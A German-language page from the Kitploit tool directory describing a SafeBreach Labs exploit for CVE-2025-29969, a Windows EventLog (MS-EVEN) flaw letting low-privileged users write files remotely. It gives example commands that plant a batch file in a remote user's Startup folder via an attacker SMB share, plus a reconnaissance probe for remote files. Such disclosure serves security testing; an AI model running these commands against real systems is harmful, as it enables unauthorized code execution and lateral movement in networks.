Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
EventLogin-CVE-2025-29969 — Ausnutzung von CVE-2025-29969 | Kitploit
Tools/GitHubGitHub/safebreach-labs/eventlogin-cve-2025-29969
Privilege EscalationAufklärungSchwachstellenanalyseExploitationLaterale BewegungPenetrationstests
GitHubsafebreach-labs/eventlogin-cve-2025-29969

EventLogin-CVE-2025-29969

Ausnutzung von CVE-2025-29969

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
6915vor 6 MonatenVon Kitploit geprüft

EventLogin - CVE-2025-29969

EventLogin ist eine Time-of-Check-Time-of-Use-Schwachstelle im MS-EVEN-Protokoll. Die Schwachstelle ermöglicht es niedrig privilegierten Benutzern, beliebige Dateien auf einem entfernten Rechner zu schreiben, wodurch die Notwendigkeit eines Administratorkontos für einen entfernten Schreibzugriff effektiv umgangen wird.

In diesem Repository gibt es zwei Skripte: Eines nutzt die Schwachstelle aus (write_file_remotely.py), und das andere verwendet eine der Schwachstellen-Primitiven, um zu prüfen, ob eine entfernte Datei existiert oder nicht – und das als niedrig privilegierter Benutzer. Dies ist nützlich, um beispielsweise installierte Programme auf anderen Computern in der Domäne zu sehen.

Die vollständige Analyse finden Sie hier:

EventLog-in: Propagating With Weak Credentials Using the Eventlog Service in Microsoft Windows

Verwendung von write_file_remotely

Erstellen Sie zunächst eine SMB-Freigabe mit impacket:

root@kitploit:~
impacket-smbserver -smb2support Share /tmp/safebreach

Hinweis: Das Skript verwendet die fest codierte 'Share' als Freigabenamen – bei Bedarf anpassen.

Führen Sie dann das Skript write_file_remotely.py aus und geben Sie alle erforderlichen Parameter an:

  1. ip_to_attack – Die IP des entfernten Rechners.
  2. smb_server_ip – Die IP des Rechners, auf dem Sie die Freigabe geöffnet haben (kann der Angreiferrechner sein).
  3. username und password – Die Anmeldedaten des niedrig privilegierten Kontos.
  4. valid_evtx_file_path – Ein Pfad zu einer gültigen EVTX-Datei, die Sie in derselben zuvor geöffneten Freigabe speichern.
  5. local_file_path – Die Datei, die Sie hochladen möchten.
  6. remote_file_path – Der entfernte Dateipfad, auf den Sie hochladen möchten.

Beispiel:

root@kitploit:~
python write_file_remotely.py 192.168.56.102 192.168.56.105 lowuser Test123 "/tmp/safebreach/Sample.evtx" "calc.bat" "C:\\Users\\lowuser\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\target.bat"

Verwendung von check_if_exists

Dieses Skript nutzt die Schwachstelle selbst nicht aus, es verwendet nur die „CreateFile“-Primitive und kann Ihnen bei der Netzwerkerkundung helfen.

Beispielsweise ist das Programmdatei-Verzeichnis eines entfernten Rechners in einer Domäne für die gesamte Gruppe „Users“ zugänglich. Das bedeutet, dass Sie mit den Anmeldedaten JEDES Benutzers prüfen können, ob eine Datei auf einem anderen Rechner existiert oder nicht.

Es akzeptiert die folgenden Parameter:

  1. ip_to_attack – IP des zu erkundenden Rechners.
  2. username – Benutzername und Passwort des Domänenbenutzers.
  3. filepath_to_check – eine zu prüfende Datei.

Beispiel: Überprüfen Sie, ob Wireshark auf dem Domänencontroller (192.168.56.57) installiert ist, und zwar mit einem niedrig privilegierten Benutzer.

root@kitploit:~
python check_if_exists.py 192.168.56.57 lowuser Password1! "C:\Program Files\Wireshark"

Ergebnis:
FILE_EXISTS_AND_IS_DIRECTORY

Tool herunterladen